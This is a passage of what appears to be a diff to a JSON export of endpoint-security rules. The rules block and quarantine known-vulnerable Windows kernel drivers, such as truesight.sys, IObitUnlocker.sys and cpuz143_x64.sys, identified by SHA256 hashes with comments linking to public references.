+ "hl_testing_start_time": "2026-03-23T11:45:31.476771Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2cd25da2ba833aa1a88d73135650434c2a6d684cf2db1261fce38aaabf54046e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd772af7-970b-55b5-bf86-30b5b908b8e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980820Z",
+ "creation_date": "2026-03-23T11:45:29.980822Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980827Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0aff24a54400fe9f86564b8ce9f874e7ff51e96085ff950baff05844cff2bd1",
+ "comment": "Vulnerable Kernel Driver (aka IObitUnlocker.sys) [https://www.loldrivers.io/drivers/4bf4b425-10af-4cd4-88e6-beb4b947eb48/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd799e87-5bc1-54bf-a6b8-e1ccf67afdc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490489Z",
+ "creation_date": "2026-03-23T11:45:31.490490Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a3ea5b9a39bf55f900964a55dadae7e34fd9476d8346a4fa701f11760aefd6f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd7b8f69-b439-5094-bd7c-7dc49f6343d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455639Z",
+ "creation_date": "2026-03-23T11:45:30.455642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455652Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e54e98df13110aac41f3207e400cce2a00df29ce18c32186e536c1de25a75ce",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd7fc026-6aa9-5b52-adca-d9f5f0d4242c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605752Z",
+ "creation_date": "2026-03-23T11:45:29.605754Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89b9823ed974a5b71de8468324d45b7e9d6dc914f93615ba86c6209b25b3cbf7",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd90d569-38de-57d8-b3f2-e1df84087617",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816246Z",
+ "creation_date": "2026-03-23T11:45:30.816248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42b31b850894bf917372ff50fbe1aff3990331e8bd03840d75e29dcc1026c180",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd9a9d8d-a442-558e-9616-b46094dc691a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157371Z",
+ "creation_date": "2026-03-23T11:45:31.157373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6e25ba22219c44a53b18b1aeb82c6e4299efe61128763211c0c5e392bcd1a6f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ddacb281-a386-573a-ba6a-a98227ab8a93",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811026Z",
+ "creation_date": "2026-03-23T11:45:31.811028Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10dd106c43f4762a9ea463b7316640bf1c76fd77b682e4a79299ef1a9ddc0220",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ddae2fce-6488-56bd-9165-0eb0df7c3054",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610371Z",
+ "creation_date": "2026-03-23T11:45:29.610373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610378Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e07bb866d329a2f9aaa4802bad04fdac9163de9bf9cfa1d035f5ca610b4b9bf",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ddc24181-ea17-51d2-9953-52dc2214cd67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149300Z",
+ "creation_date": "2026-03-23T11:45:31.149302Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5eb94cd2ed5bda08d9ca17115dbf51fe65b96a96b35ee4686a04b8cf95d39e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ddc906fa-63a2-5084-96a1-125979533406",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811833Z",
+ "creation_date": "2026-03-23T11:45:31.811835Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811840Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c432e1dfcb412fd0b3683bcfe4a9f7b49465287203d1deb2b8789b6ead00c725",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ddca0933-796e-5b4e-bf30-49cc688ec497",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604410Z",
+ "creation_date": "2026-03-23T11:45:29.604412Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cf72a6d8c4add613209a1af41c6b09013fa688c9841210b5ff1d2908d99bf00",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ddccab46-a61f-5e74-89f6-850e825c2668",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143540Z",
+ "creation_date": "2026-03-23T11:45:32.143542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9dee9c925f7ea84f56d4a2ad4cf9a88c4dac27380887bf9ac73e7c8108066504",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ddd10f07-09a7-5ac9-b1cb-3a0689569074",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968403Z",
+ "creation_date": "2026-03-23T11:45:29.968405Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968410Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80",
+ "comment": "Ours Technology Inc. Dangerous I/O Driver (aka otipcibus64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dddb3d19-bd67-5e95-9c2e-a7033aef5d4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150985Z",
+ "creation_date": "2026-03-23T11:45:31.150987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150992Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8b9625620939b828ff2a5ba06f1bbba20514a04facdf5195f77451ccaa12338",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ddf1f45d-3842-5afb-9b5f-1b1896485f83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500655Z",
+ "creation_date": "2026-03-23T11:45:31.500659Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10b5c744cec261edf6fa5374662da30f95bd823f80797c4f018f5dfeb11faf8e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ddffc375-ccdc-5e38-b8fd-9898b1037f35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144288Z",
+ "creation_date": "2026-03-23T11:45:31.144290Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144295Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41acac502ce4dc72091cf9a60425db333af0502eade520e532a4f8591fb6b5fc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de0553e0-2340-5758-8b2b-1b81148d6499",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144215Z",
+ "creation_date": "2026-03-23T11:45:31.144219Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72cb472d69def47fd89564c3f895867006908443f805971875533069a6efaf32",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de0943eb-deaf-5942-b021-772bedd0498b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829044Z",
+ "creation_date": "2026-03-23T11:45:30.829046Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829051Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c74de5c5805e87c2c2b2aec77e3416c4ddd175514950a45a7276b0972241b426",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de1681e7-21e2-5ab4-824b-ea93afa2e38d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471864Z",
+ "creation_date": "2026-03-23T11:45:31.471868Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471907Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4644ddf941ea48f122487f2a434bb4f88984b49c540f52d5f9e775b2371e2a17",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de265821-4b09-5cb3-bf26-0e6ba5f443a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143504Z",
+ "creation_date": "2026-03-23T11:45:32.143506Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2247e68386c1bdfd48687105c3728ebbad672daffa91b57845b4e49693ffd71",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de281c7d-d469-54f6-b88c-d14760339c79",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494968Z",
+ "creation_date": "2026-03-23T11:45:31.494970Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58ab20e947ed3f42da8f9e9d0efeb2045ebe880207e20612139bd8cd777d579b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de29eb6d-8d79-5078-8c72-7242928f7c85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472403Z",
+ "creation_date": "2026-03-23T11:45:30.472407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472416Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7f64b27cd3be5af1c8454680529ea493dfbb09e634eec7e316445ad73499ae0",
